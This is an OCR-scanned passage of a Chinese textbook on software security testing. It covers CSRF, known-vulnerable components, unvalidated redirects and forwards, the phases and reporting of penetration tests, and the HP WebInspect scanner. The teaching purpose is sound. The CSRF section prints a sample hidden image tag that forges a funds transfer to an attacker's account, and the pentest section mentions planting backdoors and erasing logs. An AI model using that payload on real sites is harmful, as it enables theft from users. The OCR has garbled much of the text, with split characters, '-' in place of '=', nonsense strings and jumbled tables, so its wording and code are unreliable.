7.4.11” 跨 站 请 求 伪造 


CSRF(Cross-site Request Forgery)， 跨 站 请 求 伪造 , 也 被 称 为 “one click attack” 或 者 session 
riding， 通 常 缩写 为 CSRF 或 者 XSRF， 是 一 种 对 网 站 的 恶意 利用 。 

CSRF 的 破坏 力 依赖 于 受害 者 的 权限 ， 如 果 受 害 者 只 是 个 普通 的 用 户 ， 则 一 个 成 功 的 
CSRF 攻击 会 危害 用 户 的 数据 以 及 一 些 功 能 ， 如 果 受 害 者 具有 管理 员 权 限 ， 则 一 个 成 功 的 攻 
击 甚至 会 威胁 到 整个 网 站 的 安全 。 

让 我 们 举 一 个 攻击 案例 : 应 用 程序 允许 用 户 提交 不 包含 任何 保密 字段 的 状态 改变 请 求 ， 如 
下 所 示 : 


http: //example.com/app/transferFunds?amount-1500&destinationAccount-12345 

因此 ， 攻 击 者 构建 一 个 请 求 ， 用 于 将 受害 用 户 账户 中 的 现金 转 入 自己 账户 ， 攻 击 者 可 以 
在 其 控制 的 多 个 网 站 的 图 片 包含 如 下 代码 : 

«img src-" 


http://example.com/app/transferFunds?amount-1500&destinationAccount-attac 
kersAccté"widt h-"0"height-"0"/» 


如 果 受 害 用 户 通 过 example.com 认证 后 访问 任何 一 个 攻击 者 的 网 站 , 伪造 的 请 求 将 自动 
包含 用 户 的 会 话 信 息 ， 授 权 执 行 攻击 者 的 请 求 。 


7.4.12 ”使 用 含有 已 知 漏洞 的 组 件 

己 知 漏洞 组 件 的 漏洞 攻击 可 能 在 现实 生活 中 ， 主 要 是 由 于 已 知 组 件 被 发 现 或 者 暴露 的 漏 
洞 可 能 给 非法 用 户 带 来 攻击 的 可 能 性 ， 例 如 系统 漏洞 、 网 络 漏洞 、 中 间 件 漏洞 等 ， 己 知 漏洞 
的 预防 可 以 通过 升级 已 有 软件 ， 或 者 更 新 相关 补丁 的 方式 来 预防 。 
7.4.13 ”未 验证 的 重 定向 和 转发 

重 定向 和 转发 其 实在 使 用 和 开发 过 程 中 经 常用 到 ， 具 体 的 重 定向 和 转发 是 什么 ?有 什么 
区 别 ? 以 及 可 能 有 什么 安全 问题 ? 本 节 将 逐一 介绍 。 
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* URL 转发 

URL 转发 通常 用 于 站 内 页 面 之 间 转 发 请 求 消息 , 由 目标 页 面 负责 处 理 请 求 ,并且 把 响应 
消息 发 回 给 浏览 器 。URL 转发 是 在 服务 器 内 部 将 请 求 转发 给 另外 一 个 资源 ， 浏 览 器 只 知道 发 
出 了 请 求 并 得 到 了 响应 结果 , 并 不 知道 在 服务 器 程序 内 部 发 生 了 转发 行为 。 这 个 过 程 称 为 “ 隐 
藏 路 径 URL 转发 ”， 主 要 是 指 URL 转发 后 浏览 器 地 址 栏 输入 的 网 址 不 变 。 

例如 : 当 在 浏览 器 地 址 栏 中 输入 http://www.example.com/userinfojsp 时 ， 将 这 个 处 理 的 请 
求 转 发 给 另外 一 个 页 面 处 理 ， 如 下 : 


http://www.example.com/userinfohandler.jsp; 


IE 浏览 器 的 地 址 栏 里 显示 的 地 址 仍然 是 


http://www.example.com/userinfo.jsp. 


* URL 重 定向 

在 我 们 的 工作 和 生活 中 , 当 访 问 某 个 网 页 时 , 有 时 候 会 碰 到 返回 的 消息 显示 3XX 的 HTTP 
状态 码 ，3XX 状态 码 表示 的 就 是 引导 浏览 器 重 定 向 到 另外 一 个 地 址 。 例 如 : 当 我 们 访问 
http://www.yahoo.com.cn 之 后 ， 浏 览 器 跳 转 到 http://cn.yahoo.com 就 是 一 个 典型 的 例子 。 访 问 
http://www.yahoo.com.cn 的 请 求 消息 如 下 : 

GET http://www.yahoo.com.cn:80/ HTTP/1.1 

Accept  application/x-ms-application, image/jpeg,  application/xaml:xml, image/gif, 
image/pjpeg. application/x-ms-xbap. application/vnd.ms-excel, application/vnd.ms-powerpoint, 
application/msword, */* 

Accept-Language: zh-CN 

User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; 
x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; 
Media 

Center PC 6.0; InfoPath.3; NET4.0C: .NETA4.0E; Tablet PC 2.0) UA-CPU: AMD64 

Accept-Encoding: gzip, deflate Host: www.yahoo.com.cn Proxy-Connection: Keep-Alive 

响应 信息 如 下 : 

HTTP/1.1 301 Moved Permanently Date: Mon, 06 Jan 2014 05:13:53 GMT 

Location: http://cn.yahoo.com/ Cache-Control: private Connection: close 

X-Transfer-Encoding: chunked Content-Type: text/html; charset-GBK Content-length: 150 

大 家 可 以 看 到 返回 的 301 状态 码 ， 可 以 看 到 通过 Location 将 http:/www.yahoo.com.cn 

重 定向 到 了 http://cn.yahoo.com。 

URL 重 定向 简单 说 就 是 把 一 个 URL 重 定 向 到 男 一 个 URL 上 去 , 重 定向 是 一 种 不 隐藏 路 
ft URL 转发 ， 也 称 为 显 式 转发 。URL 重 定向 后 的 地 址 栏 显示 的 地 址 为 重 定向 后 的 网 址 。 例 
如 : http://www.bbb.com 重 定向 到 http://www.aaa.com， 当 在 浏览 器 地 址 栏 中 输入 
http://www.bbb.com |H| 4- Jri , IE 浏览 器 的 地 址 栏 中 显示 的 地 址 会 由 原来 键入 的 
http://www.bbb.com 自 动 显 示 为 真正 的 目标 地 址 http://www.aaa.com。 
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。 转发 与 重 定向 的 区 别 ( 如 表 7-8 Bras) 


表 7-8 — 转发 与 重 定向 的 区 别 


转 发 
转发 方式 服务 器 端 转发 


客户 端 发 送 请 求 次 数 1 次 

客户 端 地 址 栏 是 否 改 变 变 

是 否 共 享 request 作用 域 不 共享 ， 必 须 使 用 session 传递 属性 
是 否 共 训 response 作用 域 不 共享 

速度 慢 


范围 可 以 跨 站 点 
带 参数 URL 可 带 参数 


是 否 隐藏 路 径 


危害 

URL 转发 和 重 定向 可 能 会 存在 如 下 的 攻击 : 

1. 用 户 被 指引 到 一 个 恶意 的 登录 站 点 ， 攻 击 者 可 以 通过 这 种 方式 偷 取 用 户 的 用 户 名 ; 

2. 用 户 被 指引 到 恶意 的 网 站 ， 指 引 客户 安装 一 些 恶 意 软件 会 危害 用 户 的 机 器 ; 

3. 用 户 被 指引 到 本 网 站 内 的 一 些 管理 员 的 管理 界面 ,如 果 访 问 控制 没有 做 好 ， 可 能 导致 
- 般 用 户 可 以 直接 进入 管理 界面 。 


检测 
对 于 重 定向 的 检测 可 以 用 两 种 方式 ， 一 种 是 利用 工具 对 300-307 状态 码 进行 分 析 ， 
种 是 对 代码 进行 审查 。 
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章 主 要 从 会 话 劫持 、 服 务 器 动态 渗透 、Dos 攻击 介绍 了 常见 的 动态 攻击 方式 ， 然 后 介 
绍 了 安全 标准 OWASP， 并 以 OWASP TOP 10 为 主 ， 详 细 分 析 了 目前 Web 应 用 面临 的 主要 
威胁 。 通 过 这 些 攻击 方式 的 学 习 ， 可 以 理解 动态 渗透 的 攻击 原理 和 主要 特征 ， 为 下 一 章 动态 
扫描 工具 的 学 习 打 下 理论 基础 。 
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本 章 导读 

渗透 测试 是 受信 任 的 第 三 方 进行 的 一 种 评估 网 络 安全 的 活动 ， 它 是 一 个 通过 各 种 手段 攻 
击 企业 网 络 以 找 出 系统 中 存在 的 漏洞 ， 进 而 给 出 企业 网 络 中 存在 的 风险 的 过 程 。 通 过 模拟 现 
实 的 网 络 攻 击 ， 渗 透 测试 证 实 恶 意 攻 击 者 有 可 能 获取 或 破坏 企业 的 数据 资产 。 本 章 将 介绍 渗 
透 测试 的 相关 知识 。 

应 掌握 的 知识 要 点 : 

e 活 透 测试 的 概念 

e 建立 测试 计划 

。 渗透 测试 各 阶段 的 具体 工作 内 容 

e 渗透 测试 执行 

e 编写 测试 报告 

e 渗透 测试 的 必要 性 


81 软件 安全 动态 渗透 测试 概述 


在 第 1 章 中 ， 我 们 已 经 综合 介绍 了 软件 安全 测试 的 概念 、 意 义 、 技 术 和 方法 。 本 章 我 们 
将 重点 分 析 业 界 普遍 关注 的 “软件 安全 动态 渗透 测试 ”。 


8.1.1 ”渗透 测试 的 概念 


在 当今 的 信息 时 代 ， 由 于 Intemet 连接 是 公开 的 ， 因 此 极 大 地 增加 了 保护 网 络 和 计算 机 
系统 安全 的 难度 。 各 种 网 络 攻击 手段 层出不穷 ， 企 业 和 机 构 为 降低 各 种 攻击 所 带 来 的 风险 ， 
更 注重 对 自己 的 系统 进行 专业 的 渗透 测试 ， 找 出 其 中 存在 的 安全 漏洞 和 薄弱 环节 。 那 么 ， 什 
么 是 渗透 测试 呢 ? 简单 地 说 , 渗透 测试 是 由 受信 任 的 第 三 方 进行 的 一 种 评估 网 络 安全 的 活动 ， 
它 是 一 个 通过 各 种 手段 攻击 企业 网 络 以 找 出 存在 于 系统 中 的 漏洞 ， 进 而 给 出 存在 于 企业 网 络 
中 的 风险 的 过 程 。 通 过 模拟 现实 的 网 络 攻击 ， 渗 透 测 试 证 实 了 恶意 攻击 者 有 可 能 获取 或 破坏 
企业 的 数据 资产 。 这 里 的 “恶意 攻击 者 ”实际 上 就 是 指 “ 黑 客 ”。 

黑客 这 个 术语 的 现代 意义 ， 起 源 于 1960 年 的 麻 省 理工 学 院 技术 模型 铁路 俱乐部 。 这 个 
俱乐部 设计 比例 较 大 、 细 节 逼 真 的 火车 模型 ， 而 “黑客 ”被 用 来 称呼 那些 发 现 了 聪明 技巧 的 
俱乐部 成 员 。 从 那 以 后 ,“ 黑 客 ” 这 个 术语 用 来 描述 从 计算 机 迷 到 天 赋 程 序 员 之 类 的 人 , 他们 
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的 共同 之 处 是 对 计算 机 系统 和 网 络 都 有 自发 的 探索 之 心 。 另 外 ， 开 源 软件 开发 者 也 经 常 认 为 
自己 是 黑客 ， 并 且 把 此 称谓 当 作 一 种 尊称 。 渗 透 测试 人 员 是 一 个 有 道德 的 黑客 ， 他 被 雇佣 来 
寻找 公司 网 络 的 漏洞 ， 以 便 评估 数据 安全 特性 。 攻 入 网 络 的 道德 黑客 小 组 被 称 为 老虎 队 。 老 
虎 队 是 一 组 程序 员 或 用 户 ， 他 们 自愿 或 被 雇佣 来 发 现 新 开发 的 软件 或 网 络 系统 中 的 错误 和 安 
全 漏洞 ， 或 者 弄 清 原 有 计算 机 网 络 的 安全 被 瓦解 的 原因 。 

渗透 测试 人 员 能 够 进行 三 种 类 型 的 测试 : 

1) Eel. 渗透 者 完全 处 于 对 系统 一 无 所 知 的 状态 , 通常 此 类 型 测试 ,最初 的 信息 获 
取 来 自 于 DNS、Web、Email 及 各 种 公开 对 外 的 服务 器 。 例如， 进行 外 部 的 黑 盒 测试 时 ,测试 
人 员 拿 到 手 的 信息 仅 为 网 站 的 地 址 或 卫 地 址 ， 然 后 被 要 求 像 恶意 黑客 那样 破解 指定 的 网 站 。 

2) HAAA: 测试 者 可 以 通过 正常 渠道 向 被 测 单位 取得 各 种 资料 , 包括 网 络 拓扑 、 员 工 
资料 甚至 网 站 或 其 他 程序 的 代码 片段 , 也 能 够 与 单位 的 其 他 员工 (销售 、 程序 员 、 管理 者 ……) 
进行 面对面 的 沟通 。 这 类 测试 的 目的 是 模拟 企业 内 部 雇员 的 越权 操作 。 

3) 灰 盒 测试 :也 称 作 隐 秘 测试 。 它 的 “隐蔽 ”性 是 对 被 测 单 位 而 言 的 。 通常 情况 下 ， 接 受 
渗透 测试 的 单位 网 络 管理 部 门 会 收 到 通知 :在 某 些 时 段 进行 测试 。 因 此 能 够 监测 网 络 中 出 现 
的 变化 。 但 隐秘 测试 在 被 测 单位 也 仅 有 极 少数 人 知晓 测试 的 存在 ， 因 此 能 够 有 效 地 检验 单位 
中 的 信息 安全 事件 的 监控 、 响 应 、 恢 复 做 得 是 否 到 位 。 

渗透 测试 人 员 要 测试 漏洞 和 威胁 。 漏 洞 是 能 够 用 来 破坏 安全 策略 的 弱点 、 设 计 或 实现 错 
Yes 威胁 是 一 种 能 引起 破坏 的 潜在 安全 侵害 ， 如 暴露 敏感 数据 、 算 改 数据 、 破 坏 数 据 及 拒绝 
服务 等 ， 而 安全 则 关注 避免 威胁 的 资源 保护 。 威 胁 可 能 破坏 三 个 方面 的 特性 ， 机密 性 、 完 整 
性 和 可 用 性 ， 简 称 为 CIA(Confidentiality，Integrity，Availability)。 其 中 ， 机 密 性 威胁 是 指数 
据 被 非 授 权 查 阅 的 风险 ， 完 整 性 威胁 是 指数 据 被 非 授 权 用 户 算 改 的 风险 ， 可 用 性 威胁 是 指 用 
户 不 能 使 用 服务 或 网 络 资源 的 风险 。 


8.1.2 ”渗透 测试 阶段 划分 


渗透 测试 可 划分 为 下 述 5 个 阶段 : 侦察、 扫描、 获取 访问 、 维 持 访 问 和 擦 除 证 据 。 

在 侦察 阶段 ， 测 试 人 员 尽 可 能 多 地 收集 所 选 目标 的 信息 。 侦 察 分 为 主动 侦察 和 被 动 侦察 
两 种 形式 。 在 主动 侦察 攻击 中 ， 测 试 人 员 使 用 诸如 nslookup, dig, SamSpade 的 工具 探测 目 
标 网 络 ， 以 获取 诸如 TP 地 址 范围 这 样 的 内 容 。 在 被 动 侦察 攻击 中 ,测试 者 使 用 诸如 新 闻 组 或 
招聘 帖子 这 样 的 公开 可 用 信息 来 发 现 有 关公 司 技术 的 信息 。 

在 扫描 阶段 ， 测 试 者 使 用 诸如 Nmap 这 样 的 工具 扫描 开放 端口 ， 以 获取 网 络 的 特征 。 这 
个 阶段 的 目标 是 确定 运行 在 目标 主机 上 的 服务 。 也 正 是 在 这 个 阶段 ， 测 试 人 员 完 成 操作 系统 
的 指纹 识别 ， 即 通过 匹配 目标 主机 的 操作 系统 特征 ， 确 定 该 操作 系统 的 类 型 。 

扫描 阶段 的 工作 也 包括 漏洞 扫描 。 漏 洞 测 试 的 目标 是 试图 利用 被 发 现 的 漏洞 ， 而 当成 功 
利用 后 ,就 获取 了 对 目标 主机 的 访问 。 通 过 安装 后 门 木 马 程序 , 测试 者 能 反复 进入 目标 系统 ， 
这 样 就 实现 了 维持 访问 的 目的 。 

测试 的 最 后 一 个 阶段 是 擦 除 证 据 。 有 道德 的 黑客 希望 了 解 他 们 能 否 擦 除 可 能 记录 了 他 们 
在 目标 网 络 中 活动 的 日 志文 件 。 由 于 很 多 攻击 就 是 在 悄 无 声息 地 进行 ， 因 此 ， 评 估 日 志 中 能 


第 8 章 软件 安全 动态 渗透 测试 *293* 


够 记录 什么 攻击 以 及 擦 除 这 些 日 志 的 难度 也 是 一 件 重要 的 事情 。 另 外 ， 在 擦 除 日 志 之 前 一 定 
要 确保 得 到 了 这 种 授权 。 如 果 测 试 者 不 能 证 明 他 们 进行 了 日 志 擦 除 ， 那 么 擦 除 这 样 的 日 志文 
件 就 会 导致 责任 问题 。 如 果 没 有 授权 擦 除 日 志 ， 那 么 可 以 测试 事件 通知 过 程 ， 并 向 客户 了 解 
是 否 得 到 了 适宜 的 通知 。 


82 ”渗透 测试 执行 过 程 


常言 道 ， 不 打 无 准备 之 仗 。 与 所 有 大 型 项 目 一 样 ， 渗 透 测 试 的 成 功 也 来 自 严谨 的 系统 规 
划 。 渗 透 测 试 并 不 是 通过 随机 运行 几 个 工具 就 完成 了 安全 评估 。 渗 透 测试 需要 建立 一 个 系统 
的 、 可 以 一 步 步 精 确 执行 的 计划 ， 这 个 计划 必须 精确 地 描述 要 做 什么 、 什 么 时 候 做 以 及 如 何 
去 做 。 


82.4 渗透 测试 各 阶段 的 具体 工作 内 容 


完整 的 渗透 测试 都 应 该 包括 下 述 步骤 : 

1) 侦察 一 一 收集 目标 网 络 信息 的 最 初 阶段 ; 

2) 列举 一 一 查询 活动 系统 ， 从 而 抓 取 网 络 共享 、 用 户 及 特定 应 用 程序 信息 的 过 程 ; 

3) 获取 访问 一 一 实际 渗透 过 程 ; 

4) 维持 访问 一 一 测试 者 将 后 门 程序 放 入 到 被 利用 系统 中 ， 以 便 未 来 使 用 ; 

5) 抹 去 踪迹 -一 删除 日 志文 件 项 、 控 除 进入 系统 痕迹 的 过 程 。 

在 开始 第 一 步 工作 之 前 ， 还 要 和 客户 或 管理 层 (如 果 进 行内 部 测试 的 话 ) 完 成 下 述 任务 ， 
缩小 项 目 范围 ;确定 是 否 使 用 社会 工程 ;决定 是 否 允 许 使 用 会 话 劫持 ;就 木马 和 后 门 软件 的 
使 用 达成 一 致 。 

822 ”渗透 测试 的 执行 


1) 时 间 选 择 ， 为 减轻 渗透 测试 对 网 络 和 主机 的 影响 ， 渗 透 测试 时 间 尽 量 安排 在 业务 量 
不 大 的 时 段 或 晚上 。 

2) 策略 选择 :为 防止 渗透 测试 造成 网 络 和 主机 的 业务 中 断 ， 在 渗透 测试 中 不 使 用 含有 
拒绝 服务 的 测试 策略 。 

3) 授权 渗透 测试 的 监测 手段 ， 在 评估 过 程 中 ， 由 于 渗透 测试 的 特殊 性 ， 用 户 可 以 要 求 
对 整体 测试 流程 进行 监控 (可 能 提高 渗透 测试 的 成 本 )。 

4) 测试 方 自控 :由 渗透 测试 方 对 本 次 测 透 测试 过 程 中 的 三 方面 数据 进行 完整 记录 : 操 
作 、 响 应 、 分 析 ， 最 终 形成 完整 有 效 的 渗透 测试 报告 提交 给 用 户 。 

5) 用 户 监 控 : 用 户 监控 有 四 种 形式 ， 其 一 全 程 监控 : 采用 类 似 Ethereal 的 嗅 探 软件 进行 
全 程 抓 包 嗅 探 ， 其 二 择 要 监控 : 对 扫描 过 程 不 进行 录制 ， 仅 仅 在 安全 工程 师 分 析 数 据 后 ， 准 
备 发 起 渗透 前 才 开启 软件 进行 嗅 探 ， 其 三 主机 监控 : 仅 监控 受 测 主 机 的 存活 状态 ， 避 免 意外 
情况 发 生 ， 其 四 指定 攻击 源 ， 用 户 指 定 由 特定 攻击 源 地 址 进行 攻击 ， 该 源 地 址 的 主机 由 用 户 
进行 进程 、 网 络 连接 、 数 据 传输 等 多 方 监控 。 
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6) 保守 策略 选择 : 对 于 不 能 接受 任何 可 能 风险 的 主机 系统 ， 如 银行 票据 核查 系统 、 电 力 
调度 系统 等 ， 可 选择 如 下 保守 策略 : 

a) 复制 一 份 目 标 环境 ， 包 括 硬 件 平台 、 操 作 系 统 、 数 据 库 管 理 系 统 、 应 用 软件 等 。 

b) 对 目标 的 副本 进行 渗透 测试 。 
8.23 ”编写 渗透 测试 报告 

一 份 有 价值 的 渗透 测试 报告 ， 能 够 帮助 IT 管理 者 迅速 定位 组 织 中 的 薄弱 环节 ， 用 最 少 
的 代价 规避 可 能 遇 到 的 风险 。 渗 透 测试 报告 重 在 精确 、 简 洁 。 一 份 有 价值 的 测试 报告 应 包括 
的 内 容 如 图 8-1 所 示 : 


A 目标 系统 案例 自 有 的 优势 
渗透 结论 |A 存在 的 安全 问题 
漏洞 列表 
M 结论 


测试 项 目 概述 


Ad 


概述 测试 时 间 
á 1 测试 地 点 


测试 参与 人 员 


渗透 测试 报告 


攻击 阶段 简 述 
采用 的 攻击 技术 简 评 


后 攻击 阶段 


渗透 测试 过 程 


部 分 证 据 


C Qm 
测试 方法 
图 8-1 。 渗透 测试 报告 内 容 


一 份 合格 的 渗透 测试 报告 还 应 当 注 意 : 

1) 渗透 结论 要 简洁 、 清 晰 ， 便 于 网 络 管理 者 或 开发 者 能 够 迅速 明白 症结 所 在 ; 

2) 预 攻击 阶段 的 操作 是 很 多 企业 重点 关注 的 , 因为 他 们 不 仅 希望 知道 哪些 方法 能 够 攻击 
自己 ， 还 希望 知道 渗透 测试 者 尝试 过 哪些 方法 ， 面 对 哪 种 类 型 的 攻击 ， 自 己 是 安全 的 ; 

3) 攻击 阶段 的 具体 操作 无 疑 是 报告 中 的 精彩 部 分 , 因此 攻击 步骤 和 依据 的 理论 应 尽量 详细 ; 

4) 依据 测试 结果 给 出 解决 方案 。 


824 ”渗透 测试 的 必要 性 


渗透 测试 利用 网 络 安全 扫描 器 、 专 用 安全 测试 工具 和 富有 经 验 的 安全 工程 师 的 人 工 经 验 
对 网 络 中 的 核心 服务 器 及 重要 的 网 络 设备 ， 包 括 服务 器 、 网 络 设备 、 防 火 墙 等 进行 非 破 坏 性 
质 的 模拟 黑客 攻击 , 目的 是 侵入 系统 并 获取 机 密 信息 并 将 入 侵 的 过 程 和 细节 产生 报告 给 用 户 。 
渗透 测试 虽然 需要 投入 的 人 力 资源 较 大 ， 但 是 可 以 发 现 逻 辑 性 更 强 、 更 深层 次 的 弱点 。 

从 渗透 测试 中 ， 我 们 可 以 得 到 以 下 收益 : 

1) 协助 用 户 发 现 组 织 中 的 安全 最 短 板 ， 协 助 企业 有 效 地 了 解 目前 降低 风险 的 初始 任务 

2) 一 份 文档 齐全 有 效 的 渗透 测试 报告 有 助 于 组 织 的 YT 管理 者 明了 目前 安全 现状 ， 从 而 
增强 安全 的 认 知 程度 ， 甚 至 提高 组 织 在 安全 方面 的 预算 ; 

3) 渗透 测试 有 助 于 组 织 中 的 所 有 成 员 意识 到 自己 岗位 的 安全 重要 性 ， 从 而 提升 内 部 
安全 。 


83 ”本章 小 结 


本 章 介绍 了 渗透 测试 的 阶段 划分 和 执行 过 程 中 应 注意 的 事项 ， 最 后 通过 测试 报告 体现 渗 
透 测试 的 必要 性 。 一 个 完整 的 渗透 测试 有 助 于 提升 软件 的 安全 性 ， 为 有 效 抵御 渗透 攻击 提供 
了 技术 保障 。 


第 9 章 ”Weblnspect 概 述 


本 章 导读 


HP WebInspect 是 一 款 可 配置 的 自动 化 Web 应 用 安全 和 渗透 测试 工具 。 它 旨 在 模拟 实际 


的 黑客 入 侵 和 攻击 ， 支 持 全 面 透彻 的 Web 应 用 和 安全 漏洞 分 析 服 务 。 本 章 将 介绍 WebInspect 
的 基础 知识 和 安装 方法 。 


应 掌握 的 知识 要 点 : 

* WebInspect 的 主要 特点 
o fe4Apfoii agi 

* WeblInspect 报告 

* WebInspect 手动 黑客 控制 
。 WebInspect 的 扫描 策略 
* Web 服务 评估 

。  WebInspect 工具 

* WebInspect 新 特征 

* WebInspect 软件 安装 

* WebInspect 主要 功能 


9.1 Weblnspect 的 主要 特点 


9.1.1 Weblnspect 介绍 


目前 , 许多 复杂 的 Web 应 用 程序 主要 基于 新 兴 的 Web 2.0 技术 , HP WebInspect 可 以 对 


这 些 应 用 程序 执行 Web 应 用 程序 安全 测试 和 评估 。HP WebInspect 可 提供 快速 扫描 功能 、 广 
泛 的 安全 评估 及 准确 的 Web 应 用 程序 安全 扫描 。 虽然 传统 应 用 扫描 程序 在 发 现 Web 1.0 技术 


g 


PIE AEBURHR EE, B EEE Web 2.0 技术 时 通常 显得 不 够 智能 。 
WebInspect 可 识别 很 多 传统 扫描 程序 检测 不 到 的 安全 漏洞 。 利 用 创新 的 评估 技术 ， 例 如 


同步 扫描 和 审计 (SCA，Simultaneous Crawl and Audib 及 扫描 并 发 应 用 程序 ， 用 户 可 以 快速 而 
准确 地 自动 执行 Web 应 用 程序 安全 测试 和 Web 服务 安全 测试 。 


WebInspect 是 准确 和 自动 的 Web 应 用 程序 和 Web 服务 漏洞 评估 解决 方案 。 使 用 


WebInspect， 安 全 专业 人 士 和 规范 审计 人 员 可 以 便捷 地 分 析 Web 应 用 程序 和 Web 服务 。 
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WebInspect 是 由 全 球 领先 的 Web 安全 专家 每 天 维护 和 更 新 的 唯一 产品 。 这 些 解决 方案 专门 设 
计 用 来 评估 潜在 的 安全 漏洞 ， 并 提供 所 有 用 户 需 要 解决 这 些 问 题 的 信息 。 

WebInspect 可 提供 评估 技术 的 最 新 发 展 ， 能 适应 任何 企业 环境 的 Web 应 用 安全 产品 。 当 
用 户 开始 进行 漏洞 评估 时 ，WebInspect 的 “评估 代理 ”(Assessment Agent) 能 对 Web 应 用 的 所 
有 区 域 进行 分 析 ， 当 这 些 代理 完成 评估 后 ， 研 究 结果 被 发 布 到 核心 的 安全 引擎 去 分 析 ， 然 后 
WebInspect 启动 审计 引擎 评估 所 收集 的 信息 并 应 用 攻击 算法 来 查找 漏洞 的 位 置 ， 从 而 确定 
其 严重 程度 。 通 过 这 个 方法 ，WebInspect 可 持续 使 用 适当 的 评估 资源 来 适应 用 户 特定 的 应 
用 环境 。 


9.1.2 Weblnspect 的 主要 特征 


以 下 是 WebInspect 功能 的 一 个 简要 概述 。 
1. 爬行 和 审计 


WebInspect 可 以 用 乳 行 和 审计 这 两 种 基本 模式 来 确定 检测 对 象 的 安全 弱点 。 
e; Xil Weblnspect 来 识别 目标 网 站 结构 的 一 个 过 程 。 从 本 质 上 讲 , Tei Sol pA 
网 站 ， 直 到 没有 更 多 的 URL 可 以 访问 。 
审计 是 目标 网 站 的 漏洞 评估 。 当 让 行 和 审计 组 合成 为 一 个 新 功能 时 ， 称 之 为 扫描 。 
扫描 是 基于 实时 审计 结果 的 细 化 , 产生 整个 Web 应 用 程序 的 攻击 面 的 全 面 视图 。 智能 引 
擎 采用 了 基于 逻辑 的 、 结 构 化 的 方法 来 分 析 一 个 应 用 程序 ， 然 后 基于 应 用 程序 的 行为 和 环境 
进行 自 定义 攻击 。Webmnspeet 把 这 些 先进 的 、 具 有 突破 性 的 评估 技术 与 存储 在 漏洞 数据 库 中 
已 知 的 Web 应 用 程序 漏洞 相 结 合 来 进行 扫描 。 
2. 报告 


使 用 WebInspect 报告 可 获得 有 价值 、 有 组 织 的 应 用 程序 信息 。 在 WebInspect 的 报告 中 ， 
可 以 自 定义 报告 细节 ， 决 定 什么 级 别 的 信息 包含 在 哪 一 个 报告 中 ， 使 报告 适应 每 一 个 特定 的 
上 户 。 也 可 以 使 用 报告 设计 器 创建 自己 的 报告 ， 保 存 各 种 格式 的 报告 ， 还 可 以 使 用 图 形 方式 
来 表达 汇总 后 的 漏洞 数据 。 

3. 手动 黑客 控制 


使 用 WebInspect, 可 看 到 网 站 上 实际 发 生 了 什么 事件 , 也 可 以 模拟 一 个 真正 攻击 的 环境 。 
使 用 WebInspect 能 够 查看 任何 页 面 中 包含 漏洞 的 代码 ， 然 后 修改 服务 器 请 求 并 立即 提交 。 

使 用 网 络 代理 工具 ， 如 Web 代理 ， 从 客户 端 接收 请 求 ， 从 服务 器 接收 响应 ， 或 者 找到 满 
足 自 己 创建 的 搜索 规则 的 文本 ， 可 以 暂停 客户 机 到 服务 器 的 数据 流 。 

4. 总 结 和 修正 


扫描 过 程 中 ，WebInspect 为 所 有 的 漏洞 检测 提供 汇总 和 补救 信息 。 其 中 包括 参考 材料 、 
补丁 链接 、 预 防 未 来 问题 说 明和 漏洞 的 解决 方案 。 随 着 新 的 攻击 和 非 正常 使 用 的 发 生 ， 
WebInspect 也 将 总 结 和 修正 信息 数据 库 。WebInspect 工具 栏 包 含 “ 智 能 更 新 ”选项 ， 通 过 更 
新 数据 库 提供 最 新 漏洞 解决 方案 。 


5. 扫描 策略 
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WebInspect 可 修改 和 自 定 义 扫 描 策 略 ， 减 少 WebInspect 完成 全 部 扫描 所 耗费 的 时 间 ， 以 
满足 用 户 组 织 的 要 求 。 


来 适应 任何 Web 应 上 


程序 环境 ， 并 使 用 自 定义 检查 向 导 来 创建 自 定义 攻 


6. 可 排序 和 定制 的 视图 


用 户 还 可 以 扩展 WebInspect 产品 的 功能 ， 以 满足 组 织 的 特定 需求 。 可 配置 WebInspect 


Ho 


当 进 行 扫描 或 查看 一 个 扫描 时 ， 在 WebInspect 窗口 左边 的 导航 窗 格 中 包括 网 站 、 序 列 、 


搜索 和 步 模式 (Step Mode) 按 钮 ， 这 些 按钮 决定 了 导航 窗 格 中 显示 的 内 容 (或 “视图 ”)。 
。 网 站 视图 展现 WebInspect 检测 到 的 所 扫描 网 站 的 文件 层次 结构 。 
。 序列 视图 根据 WebInspect 自动 评估 或 手动 仆 行 ( 步 模式 ) 的 结果 顺序 ， 显 示 服务 器 


。 搜索 视图 能 找到 满足 指定 条 件 的 会 话 。 

。 步 模式 能 用 来 手动 浏览 网 站 ， 起 始点 为 从 网 站 视图 或 序列 视图 中 选择 的 会 话 。 

7. 整个 企业 范围 内 的 应 用 能 力 

从 整体 企业 的 角度 看 ， 综 合 的 评估 过 程 为 Web 状态 提供 了 一 个 全 面 的 概览 , 使 用 户 能 有 
选择 地 对 网 络 上 所 有 基于 Web 的 应 用 进行 单独 的 或 计划 的 评估 。 

8. Web 服务 评估 

WebInspect 提供 针对 Web 服务 漏洞 的 全 面 评估 ， 通 过 WebInspect 可 评估 包含 Web 
Services/ SOAP(Simple Object Access Protocol， 简 单 对 象 访问 协议 ) 对 象 的 应 用 系统 。 


9. 导出 向 导 


通过 WebInspect 可 配置 的 XML 导出 工具 ， 用 户 能 以 一 种 标准 化 的 XML 格式 导出 扫描 
过 程 中 发 现 的 所 有 信息 ， 包 括 注释 、 隐 藏 域 、JavaScript、Cookie、Web 窗 体 、URL、 请 求 和 
会 话 。 用 户 可 指定 要 导出 信息 的 类 型 。 导 出 向 导 还 包括 一 个 “清理 ”功能 ， 可 以 防止 导出 信 


息 中 包含 敏感 数据 。 
10. 工具 


在 WebInspect 中 集成 了 一 系列 诊断 和 渗透 测试 工具 ， 包 括 : 
。 审计 输入 编辑 器 

® Cookie Cruncher 

。 编码 器 /解码 器 

。 HITP 编辑 器 


。 日 志 查 看 器 
。 第 管理 器 


。 正则 表达 式 编辑 器 


。 报表 设计 器 
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* Server 分 析 

e Server 事件 探查 器 
。 智能 更 新 

。 SQL 注 入 

。 SWF 扫描 

。 Web Brmte( 网 络 狂人 ) 
e 网 络 发 现 

* Web 窗 体 编辑 器 
* 网络 Fuzzer 

。 网 络 宏 录 制 

。 Web 代理 


9.1.3 Weblnspect 新 特征 


WeblInspect 是 首届 一 指 的 Web 应 用 程序 安全 评估 工具 ,其 设计 专门 针对 当今 复杂 的 、 基 
于 新 兴 的 Web 2.0 技术 Web 应 用 程序 。 这 种 新 架构 提供 更 快 的 扫描 能 力 、 更 广 的 评估 范围 ， 
